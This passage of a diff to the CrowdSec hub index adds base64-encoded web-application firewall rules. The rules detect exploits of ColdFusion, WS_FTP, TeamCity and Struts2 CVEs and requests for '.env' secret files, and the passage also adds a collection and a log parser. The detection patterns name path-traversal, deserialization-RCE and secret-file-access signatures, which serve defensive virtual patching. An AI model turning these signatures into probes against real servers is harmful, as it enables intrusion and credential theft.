+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzgyMDUKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMzgyMDUgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogLi5jZmlkZS93aXphcmRzL2NvbW1vbi8KbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQWRvYmUgQ29sZEZ1c2lvbiBhY2Nlc3MgY29udHJvbCBieXBhc3MgKENWRS0yMDIzLTM4MjA1KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMzgyMDUKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4NA==",
+   "description": "Detect CVE-2023-38205 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-38205",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-284"
+    ],
+    "confidence": 3,
+    "label": "Adobe ColdFusion access control bypass (CVE-2023-38205)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-40044": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "2e8db7d8cb223e1cb1a57c4621b1720d88174c3398183948c8901645f78ee338",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "e49809530908e16a9628fece23d934be09d9756fc64f795d7311e70565a2f32e",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDAwNDQKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtNDAwNDQgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2FodC8KICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIEJPRFlfQVJHUwogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gYjY0ZGVjb2RlCiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGNvbnRhaW5zCiAgICAgICAgdmFsdWU6ICI8czpzdHJpbmc+Y21kPC9zOnN0cmluZz4iCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIldTX0ZUUCAuTkVUIGRlc2VyaWFsaXplIFJDRSAoQ1ZFLTIwMjMtNDAwNDQpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAyMy00MDA0NAogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtNTAyCgoK",
+   "description": "Detect CVE-2023-40044 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-40044",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-502"
+    ],
+    "confidence": 3,
+    "label": "WS_FTP .NET deserialize RCE (CVE-2023-40044)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-42793": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml",
+   "version": "0.1",
+   "versions": {
+    "0.1": {
+     "digest": "86fb6a193e9799612bf00b67894f7aabe4482f024a012f305b2cfa910384aa73",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDI3OTMKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtNDI3OTMiCnJ1bGVzOgogIC0gem9uZXM6CiAgICAtIFVSSQogICAgdHJhbnNmb3JtOgogICAgLSBsb3dlcmNhc2UKICAgIG1hdGNoOgogICAgICB0eXBlOiBlbmRzV2l0aAogICAgICB2YWx1ZTogL3JwYzIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiSmV0QnJhaW5zIFRlYW1jaXR5IGF1dGggYnlwYXNzIChDVkUtMjAyMy00Mjc5MykiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIzLTQyNzkzCiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS0yODgK",
+   "description": "Detect CVE-2023-42793",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-42793",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-288"
+    ],
+    "confidence": 3,
+    "label": "JetBrains Teamcity auth bypass (CVE-2023-42793)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-CVE-2023-50164": {
+   "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml",
+   "version": "0.2",
+   "versions": {
+    "0.1": {
+     "digest": "2af3917de29ccf7f71d43b78502602568b2d4582769e62ffb9c195fcfab33e90",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "05c4eb4526d99bc0c9cbefbcc60e2fde6f93f5b0f41ea500565f791ae57ed67e",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtNTAxNjQgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogdXBsb2FkLmFjdGlvbgogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IFBPU1QKICAgIC0gem9uZXM6CiAgICAgIC0gQk9EWV9BUkdTCiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gdXBsb2FkRmlsZU5hbWUKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogIi4uLyIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQXBhY2hlIFN0cnV0czIgKENWRS0yMDIzLTUwMTY0KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtNTAxNjQKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTU1MgoKCg==",
+   "description": "Detect CVE-2023-50164 exploits ",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2023-50164",
+     "attack.T1595",
+     "attack.T1190",
+     "cwe.CWE-552"
+    ],
+    "confidence": 3,
+    "label": "Apache Struts2 (CVE-2023-50164)",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
+  "crowdsecurity/vpatch-env-access": {
+   "path": "appsec-rules/crowdsecurity/vpatch-env-access.yaml",
+   "version": "0.1",
+   "versions": {
+    "0.1": {
+     "digest": "ae22c494fb05801bc4886564e63927ccc248be20b1d1dc31f1011a27a4d75cbe",
+     "deprecated": false
+    }
+   },
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtZW52LWFjY2VzcwpkZXNjcmlwdGlvbjogIkRldGVjdCBhY2Nlc3MgdG8gLmVudiBmaWxlcyIKcnVsZXM6CiAgLSB6b25lczoKICAgIC0gVVJJCiAgICB0cmFuc2Zvcm06CiAgICAtIGxvd2VyY2FzZQogICAgbWF0Y2g6CiAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgIHZhbHVlOiAvLmVudgpsYWJlbHM6CiAgdHlwZTogc2NhbgogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOnNjYW4iCiAgbGFiZWw6ICJBY2Nlc3MgdG8gLmVudiBmaWxlIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAo=",
+   "description": "Detect access to .env files",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:scan",
+    "classification": [
+     "attack.T1595",
+     "attack.T1190"
+    ],
+    "confidence": 3,
+    "label": "Access to .env file",
+    "service": "http",
+    "spoofable": 0,
+    "type": "scan"
+   }
+  }
+ },
  "collections": {
   "Dominic-Wagner/vaultwarden": {
    "path": "collections/Dominic-Wagner/vaultwarden.yml",
@@ -530,6 +1243,97 @@
     "crowdsecurity/vsftpd"
    ]
   },
+  "crowdsecurity/appsec-crs": {
+   "path": "collections/crowdsecurity/appsec-crs.yaml",
+   "version": "0.4",
+   "versions": {
+    "0.1": {
+     "digest": "61d5e358aa86b872300e540be39b066c278567c4948bb74d4e4f339bbb126154",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "a9f36fac18d19edcb0c3a2a4ff3d58570fc407ac39fb9447e9dac7510184fd47",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "7f56cb3fa217f983d1648e6aea36d399be444e09046c0b5b23e7eb55480eaf89",
+     "deprecated": false
+    },
+    "0.4": {
+     "digest": "a9f36fac18d19edcb0c3a2a4ff3d58570fc407ac39fb9447e9dac7510184fd47",
+     "deprecated": false
+    }
+   },
+   "long_description": "IyBNb2RTZWN1cml0eSBDUlMKCg==",
+   "content": "cGFyc2VyczoKICAtIGNyb3dkc2VjdXJpdHkvYXBwc2VjLWxvZ3MKYXBwc2VjLWNvbmZpZ3M6CiAgLSBjcm93ZHNlY3VyaXR5L2NycwphcHBzZWMtcnVsZXM6CiAgLSBjcm93ZHNlY3VyaXR5L2NycwpkZXNjcmlwdGlvbjogIkFwcHNlYzogTW9kc2VjdXJpdHkgY29yZSBydWxlIHNldCBydWxlcyIKYXV0aG9yOiBjcm93ZHNlY3VyaXR5CnRhZ3M6CiAgLSBsaW51eAogIC0gaHR0cAogIC0gYXBwc2VjCiAgLSBtb2RzZWN1cml0eQo=",
+   "description": "Appsec: Modsecurity core rule set rules",
+   "author": "crowdsecurity",
+   "labels": null,
+   "parsers": [
+    "crowdsecurity/appsec-logs"
+   ],
+   "appsec-rules": [
+    "crowdsecurity/crs"
+   ],
+   "appsec-configs": [
+    "crowdsecurity/crs"
+   ]
+  },
+  "crowdsecurity/appsec-virtual-patching": {
+   "path": "collections/crowdsecurity/appsec-virtual-patching.yaml",
+   "version": "0.3",
+   "versions": {
+    "0.1": {
+     "digest": "a165d638c8d826a932e4ca4e70ec5379d558a0bee1356e871c7c92cc2df714fc",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "4bacd3307cc84a5498d0939c83df3eccf40f430d4eedbdc1f7e7ae1fb8b71676",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "28962f063f10702629018df810167378d8250185ab8d64f4f5d1454b14dd1d4f",
+     "deprecated": false
+    }
+   },
+   "long_description": "IyBBcHBTZWMgVmlydHVhbCBQYXRjaGluZwoKVGhpcyBjb2xsZWN0aW9uIGNvbnRhaW5zIHZpcnR1YWwgcGF0Y2hpbmcgZm9yIGNvbW1vbmx5IGV4cGxvaXRlZCB2dWxuZXJhYmlsaXRpZXMsIGFuZCBpcyBpbnNwaXJlZCBmcm9tIHRoZSBbQ0lTQSBLbm93biBFeHBsb2l0ZWQgVnVsbmVyYWJpbGl0aWVzIENhdGFsb2ddKGh0dHBzOi8vd3d3LmNpc2EuZ292L2tub3duLWV4cGxvaXRlZC12dWxuZXJhYmlsaXRpZXMtY2F0YWxvZykuIFRoZSBnb2FsIGlzIHRvIHByb3ZpZGUgdmlydHVhbCBwYXRjaGluZyBjYXBhYmlsaXRpZXMgZm9yIHRoZSBvZnRlbiBleHBsb2l0ZWQgdnVsbmVyYWJpbGl0aWVzLCBhdm9pZGluZyBmYWxzZSBwb3NpdGl2ZXMgd2hpbGUgY2F0Y2hpbmcgcG9wbGUgc2NvdXRpbmcgeW91ciBhcHBsaWNhdGlvbnMgZm9yIGp1aWN5IHZ1bG5lcmFiaWxpdGllcy4K",
+   "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9hcHBzZWMtdmlydHVhbC1wYXRjaGluZwphcHBzZWMtcnVsZXM6CiAgLSBjcm93ZHNlY3VyaXR5L2Jhc2UtY29uZmlnCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1lbnYtYWNjZXNzCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00MDA0NAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTctOTg0MQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjAtMTE3MzgKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTI3OTI2CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi0zNTkxNAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDYxNjkKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIwMTk4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMjUxNQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzM2MTcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTE5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00Mjc5MwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM4MjA1CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yNDQ4OQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMjI5NDEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE5LTEyOTg5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NDg3NwphcHBzZWMtY29uZmlnczoKICAtIGNyb3dkc2VjdXJpdHkvdmlydHVhbC1wYXRjaGluZwpwYXJzZXJzOgogIC0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtbG9ncwpzY2VuYXJpb3M6CiAgLSBjcm93ZHNlY3VyaXR5L2FwcHNlYy12cGF0Y2gKZGVzY3JpcHRpb246ICJhIGdlbmVyaWMgdmlydHVhbCBwYXRjaGluZyBjb2xsZWN0aW9uLCBzdWl0YWJsZSBmb3IgbW9zdCB3ZWIgc2VydmVycy4iCmF1dGhvcjogY3Jvd2RzZWN1cml0eQoK",
+   "description": "a generic virtual patching collection, suitable for most web servers.",
+   "author": "crowdsecurity",
+   "labels": null,
+   "parsers": [
+    "crowdsecurity/appsec-logs"
+   ],
+   "scenarios": [
+    "crowdsecurity/appsec-vpatch"
+   ],
+   "appsec-rules": [
+    "crowdsecurity/base-config",
+    "crowdsecurity/vpatch-env-access",
+    "crowdsecurity/vpatch-CVE-2023-40044",
+    "crowdsecurity/vpatch-CVE-2017-9841",
+    "crowdsecurity/vpatch-CVE-2020-11738",
+    "crowdsecurity/vpatch-CVE-2022-27926",
+    "crowdsecurity/vpatch-CVE-2022-35914",
+    "crowdsecurity/vpatch-CVE-2022-46169",
+    "crowdsecurity/vpatch-CVE-2023-20198",
+    "crowdsecurity/vpatch-CVE-2023-22515",
+    "crowdsecurity/vpatch-CVE-2023-33617",
+    "crowdsecurity/vpatch-CVE-2023-34362",
+    "crowdsecurity/vpatch-CVE-2023-3519",
+    "crowdsecurity/vpatch-CVE-2023-42793",
+    "crowdsecurity/vpatch-CVE-2023-50164",
+    "crowdsecurity/vpatch-CVE-2023-38205",
+    "crowdsecurity/vpatch-CVE-2023-24489",
+    "crowdsecurity/vpatch-CVE-2021-3129",
+    "crowdsecurity/vpatch-CVE-2021-22941",
+    "crowdsecurity/vpatch-CVE-2019-12989",
+    "crowdsecurity/vpatch-CVE-2022-44877"
+   ],
+   "appsec-configs": [
+    "crowdsecurity/virtual-patching"
+   ]
+  },
   "crowdsecurity/asterisk": {
    "path": "collections/crowdsecurity/asterisk.yaml",
    "version": "0.1",
@@ -3206,6 +4010,37 @@
    "author": "crowdsecurity",
    "labels": null
   },
+  "crowdsecurity/appsec-logs": {
+   "path": "parsers/s01-parse/crowdsecurity/appsec-logs.yaml",
+   "stage": "s01-parse",
+   "version": "0.5",
+   "versions": {
+    "0.1": {
+     "digest": "b6de996d25dcbbbda4889fea9e8b05559660c54ea2ed7202430741ef40141179",
+     "deprecated": false
+    },
+    "0.2": {
+     "digest": "20fe00d38f9756169fb5d56027e5c26085e038f699a18d17be94ad6b0da14447",
+     "deprecated": false
+    },
+    "0.3": {
+     "digest": "24ea66d28ee00e9bef266b86fc56ed9e7a95e8f36027765b99389f0b4ed8c2d3",
+     "deprecated": false
+    },
+    "0.4": {
+     "digest": "60b45bc8957dfc40f270500b8ef438085294fc172c92332dcb9dcb3c14cc9c85",
+     "deprecated": false
+    },
+    "0.5": {
+     "digest": "e44f2877c363061fef239a9af472253900674bf261e8762febd06d7ef20022a0",
+     "deprecated": false
+    }
+   },
+   "content": "b25zdWNjZXNzOiBuZXh0X3N0YWdlCmZvcm1hdDogMy4wCiNkZWJ1ZzogdHJ1ZQpmaWx0ZXI6ICJldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2FwcHNlYyciCm5hbWU6IGNyb3dkc2VjdXJpdHkvYXBwc2VjLWxvZ3MKZGVzY3JpcHRpb246ICJQYXJzZSBBcHBzZWMgZXZlbnRzIgpzdGF0aWNzOgogIC0gbWV0YTogc2VydmljZQogICAgdmFsdWU6IGFwcHNlYwogIC0gbWV0YTogc291cmNlX2lwCiAgICBleHByZXNzaW9uOiAiZXZ0LlBhcnNlZC5zb3VyY2VfaXAiCiAgLSBtZXRhOiB0YXJnZXRfaG9zdAogICAgZXhwcmVzc2lvbjogImV2dC5QYXJzZWQudGFyZ2V0X2hvc3QiCiAgLSBtZXRhOiByZXF1ZXN0X3V1aWQKICAgIGV4cHJlc3Npb246ICJldnQuUGFyc2VkLnJlcV91dWlkIgogIC0gbWV0YTogdGFyZ2V0X3VyaQogICAgZXhwcmVzc2lvbjogImV2dC5QYXJzZWQudGFyZ2V0X3VyaSIKI3dhcyB0aGUgcmVxdWVzdCBibG9ja2VkID8KICAtIG1ldGE6IGxvZ190eXBlCiAgICBleHByZXNzaW9uOiB8CiAgICAgIGV2dC5BcHBzZWMuSGFzSW5CYW5kTWF0Y2hlcyA/ICJhcHBzZWMtYmxvY2siIDogImFwcHNlYy1pbmZvIgogIC0gbWV0YTogcnVsZV9uYW1lCiAgICBleHByZXNzaW9uOiBldnQuQXBwc2VjLkdldE5hbWUoKQogIC0gbWV0YTogcnVsZV9pZHMKICAgIGV4cHJlc3Npb246IFNwcmludGYoIiUrdiIsIGV2dC5BcHBzZWMuR2V0UnVsZUlEcygpKQogIC0gbWV0YTogcmVtZWRpYXRpb25fY21wdF9pcAogICAgZXhwcmVzc2lvbjogImV2dC5QYXJzZWQucmVtZWRpYXRpb25fY21wdF9pcCIK",
+   "description": "Parse Appsec events",
+   "author": "crowdsecurity",
+   "labels": null
+  },
   "crowdsecurity/asterisk-logs": {
    "path": "parsers/s01-parse/crowdsecurity/asterisk-logs.yaml",
    "stage": "s01-parse",
@@ -3308,7 +4143,7 @@
   "crowdsecurity/caddy-logs": {
    "path": "parsers/s01-parse/crowdsecurity/caddy-logs.yaml",
    "stage": "s01-parse",
-   "version": "0.5",
+   "version": "0.6",
    "versions": {
     "0.1": {
      "digest": "30bf81915d8254ab7611c156ddbe0cf389838d471f973403ae1b07fffa5b6d5a",
@@ -3329,10 +4164,14 @@
     "0.5": {
      "digest": "19673bb9a1ad806c7d615d24c37649f8c0679acb07df9ac304ba23d44eaf0f53",
      "deprecated": false
+    },
+    "0.6": {
+     "digest": "856f9882c2aa89d701dce456e97bfb4c5230b7fc83cefc54a8279d7cdac5b8fe",
+     "deprecated": false
     }
    },
    "long_description": "UGFyc2VyIGZvciBjYWRkeSBsb2dzLgpJdCBleHBlY3RzIHRoZSBkZWZhdWx0IGtleSB2YWx1ZXMgZm9yIGNhZGR5IGxvZ3MuCgpZb3UgbmVlZCB0byBzcGVjaWZ5IGNhZGR5IGNvbmZpZyB0byBlbmFibGUgbG9nZ2luZyBpbiBhIGZpbGU6CgpgYGBiYXNoCjo4MCB7CiAgICAgICAgIyBTZXQgdGhpcyBwYXRoIHRvIHlvdXIgc2l0ZSdzIGRpcmVjdG9yeS4KICAgICAgICByb290ICogL3Vzci9zaGFyZS9jYWRkeQoKICAgICAgICAjIEVuYWJsZSB0aGUgc3RhdGljIGZpbGUgc2VydmVyLgogICAgICAgIGZpbGVfc2VydmVyCgogICAgICAgICMgQW5vdGhlciBjb21tb24gdGFzayBpcyB0byBzZXQgdXAgYSByZXZlcnNlIHByb3h5OgogICAgICAgICMgcmV2ZXJzZV9wcm94eSBsb2NhbGhvc3Q6ODA4MAoKICAgICAgICAjIE9yIHNlcnZlIGEgUEhQIHNpdGUgdGhyb3VnaCBwaHAtZnBtOgogICAgICAgICMgcGhwX2Zhc3RjZ2kgbG9jYWxob3N0OjkwMDAKICAgICAgICBsb2cgewogICAgICAgICAgICAgICAgb3V0cHV0IGZpbGUgL3Zhci9sb2cvY2FkZHkvYWNjZXNzLmxvZwogICAgICAgIH0KfQoKYGBgCgpBbmQgdGhlbiBhZGQgaW4gYWNxdWlzaXRpb24gdGhpcyA6CgpgYGB5YW1sCi0tLQpmaWxlbmFtZXM6CiAtIC92YXIvbG9nL2NhZGR5L2FjY2Vzcy5sb2cKbGFiZWxzOgogIHR5cGU6IGNhZGR5CmBgYA==",
-   "content": "ZmlsdGVyOiAiZXZ0LlBhcnNlZC5wcm9ncmFtIHN0YXJ0c1dpdGggJ2NhZGR5JyAmJiBVbm1hcnNoYWxKU09OKGV2dC5QYXJzZWQubWVzc2FnZSwgZXZ0LlVubWFyc2hhbGVkLCAnY2FkZHknKSBpbiBbJycsIG5pbF0iCm9uc3VjY2VzczogbmV4dF9zdGFnZQpkZWJ1ZzogdHJ1ZQpuYW1lOiBjcm93ZHNlY3VyaXR5L2NhZGR5LWxvZ3MKZGVzY3JpcHRpb246ICJQYXJzZSBjYWRkeSBsb2dzIgpzdGF0aWNzOgogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBodHRwX2FjY2Vzcy1sb2cKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IHwKICAgICAgU3ByaW50ZigiJXYiLCBldnQuVW5tYXJzaGFsZWQuY2FkZHkudHMpIG1hdGNoZXMgJ15bMC05ZVxcLlxcK10rJCcgPyBpbnQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnRzKSA6IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS50cwogIC0gbWV0YTogc2VydmljZQogICAgdmFsdWU6IGh0dHAKICAjI0NhZGR5IG5vdyBzZXRzIGNsaWVudF9pcCB0byB0aGUgdmFsdWUgb2YgWC1Gb3J3YXJkZWQtRm9yIGlmIHVzZXJzIHNldHMgdHJ1c3RlZCBwcm94aWVzCiAgLSBwYXJzZWQ6IHJlbW90ZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuY2xpZW50X2lwCiAgLSBwYXJzZWQ6IHJlbW90ZV9hZGRyCiAgICBleHByZXNzaW9uOiAiZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIgIT0gbmlsID8gU3BsaXQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIsICc6JylbMF0gOiBuaWwiCiAgLSBtZXRhOiBzb3VyY2VfaXAKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucmVtb3RlX2lwCiAgLSBtZXRhOiBodHRwX3N0YXR1cwogICAgZXhwcmVzc2lvbjogaW50KGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5zdGF0dXMpCiAgLSBtZXRhOiBodHRwX3BhdGgKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0LnVyaQogIC0gcGFyc2VkOiByZXF1ZXN0ICNBZGQgZm9yIGh0dHAtbG9ncyBlbnJpY2hlcgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QudXJpCiAgLSBwYXJzZWQ6IHZlcmIKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0Lm1ldGhvZAogIC0gbWV0YTogaHR0cF92ZXJiCiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5tZXRob2QKICAtIHBhcnNlZDogaHR0cF91c2VyX2FnZW50CiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5oZWFkZXJzWydVc2VyLUFnZW50J11bMF0KICAtIG1ldGE6IGh0dHBfdXNlcl9hZ2VudAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaGVhZGVyc1snVXNlci1BZ2VudCddWzBdCiAgLSBtZXRhOiB0YXJnZXRfZnFkbgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaG9zdAogIC0gbWV0YTogc3ViX3R5cGUKICAgIGV4cHJlc3Npb246ICJldnQuTWV0YS5odHRwX3N0YXR1cyA9PSAnNDAxJyAmJiBldnQuVW5tYXJzaGFsZWQucmVxdWVzdC5oZWFkZXJzLkF1dGhvcml6YXRpb24gc3RhcnRzV2l0aCAnQmFzaWMgJyA/ICdhdXRoX2ZhaWwnIDogJyci",
+   "content": "ZmlsdGVyOiAiZXZ0LlBhcnNlZC5wcm9ncmFtIHN0YXJ0c1dpdGggJ2NhZGR5JyAmJiBVbm1hcnNoYWxKU09OKGV2dC5QYXJzZWQubWVzc2FnZSwgZXZ0LlVubWFyc2hhbGVkLCAnY2FkZHknKSBpbiBbJycsIG5pbF0iCm9uc3VjY2VzczogbmV4dF9zdGFnZQpuYW1lOiBjcm93ZHNlY3VyaXR5L2NhZGR5LWxvZ3MKZGVzY3JpcHRpb246ICJQYXJzZSBjYWRkeSBsb2dzIgpzdGF0aWNzOgogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBodHRwX2FjY2Vzcy1sb2cKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IHwKICAgICAgU3ByaW50ZigiJXYiLCBldnQuVW5tYXJzaGFsZWQuY2FkZHkudHMpIG1hdGNoZXMgJ15bMC05ZVxcLlxcK10rJCcgPyBpbnQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnRzKSA6IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS50cwogIC0gbWV0YTogc2VydmljZQogICAgdmFsdWU6IGh0dHAKICAjI0NhZGR5IG5vdyBzZXRzIGNsaWVudF9pcCB0byB0aGUgdmFsdWUgb2YgWC1Gb3J3